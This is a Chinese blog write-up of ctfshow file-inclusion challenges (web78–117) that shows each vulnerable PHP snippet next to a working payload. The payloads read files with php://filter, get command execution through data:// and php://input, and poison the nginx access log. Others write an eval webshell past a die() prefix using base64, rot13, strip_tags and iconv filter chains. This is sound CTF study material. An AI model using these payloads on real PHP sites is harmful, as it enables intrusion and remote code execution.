ctfshow-web-文件包含
|
|
CTFshow

1127 字
|
11 分钟
本文最后更新于 14 天前,其中的信息可能已经有所发展或是发生改变。

web78

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}

伪协议读取即可

另外提一嘴,hackerbar自带的LFI功能已经预带了一个filter伪协议,可以一键黏贴上去

Payload:

?file=php://filter/convert.base64-encode/resource=flag.php

web79

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

php都换成了???,那就不用php开头的伪协议,用data协议写🐎

Payload:

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
->
<?php system('cat flag.php');?>

web80

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

phpdata都会被替换成???,大小写可以绕过php可以用input伪协议进行RCE

Payload:

GET:
?file=phP://input
POST:
<?php system('cat *.php');?>

bp抓包改POST会比较好,我hackerbar传post数据的时候没传过去

web81

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

phpdata:都会换成???,那就尝试日志写🐎了,这里是nginx的服务器,日志路径:/var/log/nginx/access.log

Payload:

?file=/var/log/nginx/access.log
UA头:<?php system('cat fl0g.php')?>

web82-86

咕咕咕,竞争还没打

web87

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $content = $_POST['content'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    file_put_contents(urldecode($file), "<?php die('大佬别秀了');?>".$content);

    
}else{
    highlight_file(__FILE__);
}

把以上的方法都ban了,多了一个POST参数content,看wp发现这里有个知识点:filter流绕过死亡die

file_put_contents(urldecode($file), "<?php die('大佬别秀了');?>".$content);分析就会发现,他最后会变成这样:file内容<?php die('大佬别秀了');?>content内容这里是在两个变量间加入了一个die,会直接导致程序终止,这里需要绕过这个die函数

P神的文章:https://www.leavesongs.com/PENETRATION/php-filter-magic.html#

利用php://filter流的base64-decode方法来去掉中间这个die的影响,这里以厨子解码为例,可以看到,把die这段代码丢进去,会被解码成¦]‰,其原因是base64解码过程中,会先抛掉一些不在表中的字符,如:<、?、空格、(、’、)、;、>、中文字符

我们手动去除这些字符,只留下了phpdie发现base64解码内容其实是不变的

关于利用base64解码的特性,这里用到的是filter流的写入协议:php://filter/write=convert.base64-decode/resource=shell.php,把内容写到shell.php中,我们写个shell进去,这里在content里写,这里要base64编码先,因为等会要解码

<?php @eval($_GET['cmd']);?>
->
PD9waHAgQGV2YWwoJF9HRVRbJ2NtZCddKTs/Pg==
# 长度是40

为了让base64正常解码(4个4个字符一解,要配成4的倍数),现在加起来是46个字符,所以我们还得加2个字符配够解码需要的长度,于是content传入的内容变成了:

aaPD9waHAgQGV2YWwoJF9HRVRbJ2NtZCddKTs/Pg==

同时在代码里file传入的字符串会被urldecode解码一次,加上中间件也会进行一次url解码,所以要对这个字符串进行两次url编码,同时也能绕过检测(发现像cyberchef之类的在线网站不会对字母进行url编码,同时我用的hackerbar也不能对字母编码,发现了bp的编码功能可以对字母进行url编码)

Payload:

GET:
?file=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%37%33%25%36%38%25%36%35%25%36%63%25%36%63%25%32%65%25%37%30%25%36%38%25%37%30
POST:
content=aaPD9waHAgQGV2YWwoJF9HRVRbJ2NtZCddKTs/Pg==

另解:

rot13编码绕过:

利用原理类似于base64的绕过,其实是在rot13加密后php会变成cuc,如果服务器没开启短标签,他就不会认识<?头,自然不认为这是个php代码从而执行。

Payload:

GET:
?file=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%37%33%25%37%34%25%37%32%25%36%39%25%36%65%25%36%37%25%32%65%25%37%32%25%36%66%25%37%34%25%33%31%25%33%33%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%37%33%25%36%38%25%32%65%25%37%30%25%36%38%25%37%30
# php://filter/write=string.rot13/resource=sh.php
POST:
content=<?cuc @riny($_TRG['pzq']);?>
# <?php @eval($_GET['cmd']);?>

strip_tags函数去除xml标签

先对一句话木马进行 base64 编码后传入,这样就不会受到 strip_tags 函数的影响,同时去除掉 <?php die(); ?> ,由于 php://filter 允许使用多个过滤器,再调用 base64-decode 将一句话木马进行 base64 解码,实现还原木马。

Payload:

GET:
?file=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%32%25%36%35%25%36%31%25%36%34%25%33%64%25%37%33%25%37%34%25%37%32%25%36%39%25%36%65%25%36%37%25%32%65%25%37%33%25%37%34%25%37%32%25%36%39%25%37%30%25%35%66%25%37%34%25%36%31%25%36%37%25%37%33%25%37%63%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%36%31%25%32%65%25%37%30%25%36%38%25%37%30
# php://filter/read=string.strip_tags|convert.base64-decode/resource=hack.php
POST:
content=PD9waHAgQGV2YWwoJF9HRVRbJ2NtZCddKTs/Pg==

web88

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){
        die("error");
    }
    include($file);
}else{
    highlight_file(__FILE__);
}

存在waf,但是发现可以用data伪协议,比较关键的点在于过滤了,base64编码末尾的=直接删掉就行不影响,主要是不能出现+

发现<?php system('ls');?>编码后会出现+,用<?php system('ls .');?>代替,末尾=可以删掉也可以加个字符来不生产=

Payload:

?file=PD9waHAgc3lzdGVtKCd0YWMgZmwwZy5waHAnKTs/Pg==
->PD9waHAgc3lzdGVtKCd0YWMgZmwwZy5waHAnKTs/Pg==
-><?php system('tac fl0g.php');?>

web116

hint:misc+lfi

给了个视频,分离出视频和图片

<?php
function filter($x){
    if(preg_match('/http|https|data|input|rot13|base64|string|log|sess/i',$x)){
        die('too young too simple sometimes native!');
    }
}
$file=isset($_GET['file'])?$_GET['file']:"sp2.mp4";
header('Content-Type: video/mp4');
filter($file);
echo file_get_contents($file);
?>

直接包含flag.php就出了

Payload:

?file=flag.php

web117

<?php
highlight_file(__FILE__);
error_reporting(0);
function filter($x){
    if(preg_match('/http|https|utf|zlib|data|input|rot13|base64|string|log|sess/i',$x)){
        die('too young too simple sometimes naive!');
    }
}
$file=$_GET['file'];
$contents=$_POST['contents'];
filter($file);
file_put_contents($file, "<?php die();?>".$contents);

ban了base64rot13string意味着我们上面的方法都失效了,可以用转换字符编码来绕过

https://www.cnblogs.com/linuxsec/articles/12684259.html

用法:
convert.iconv.<input-encoding>.<output-encoding> 
<?php
$a = iconv("UCS-2LE","UCS-2BE", '<?php @eval($_GET[a]);?>');
echo $a;
?>

得到编码后结果:?<hp pe@av(l_$EG[T]a;)>?

Payload:

GET:
?file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=sh.php
POST:
contents=?<hp pe@av(l_$EG[T]a;)>?
暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
													

					

				

			

			
			

				

					
				

			

				

											

							
							
						

																				
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇
下一篇 

                    

                    
			        推荐文章
		            

		            

							
ctfshow-web-xxe

							
							

							
ctfshow-web-xss

							
							

							
ctfshow-web-反序列化

							
							

							
ctfshow-web-sql注入(下)

							
							

							
ctfshow-web-sql注入(上)

							
							

							
ctfshow-web-文件上传

							
							

							
ctfshow-web-php特性

							
							

							
ctfshow-web-命令执行-下

							
							

							
ctfshow-web-命令执行-上

							
							

							
ctfshow-web21~28-爆破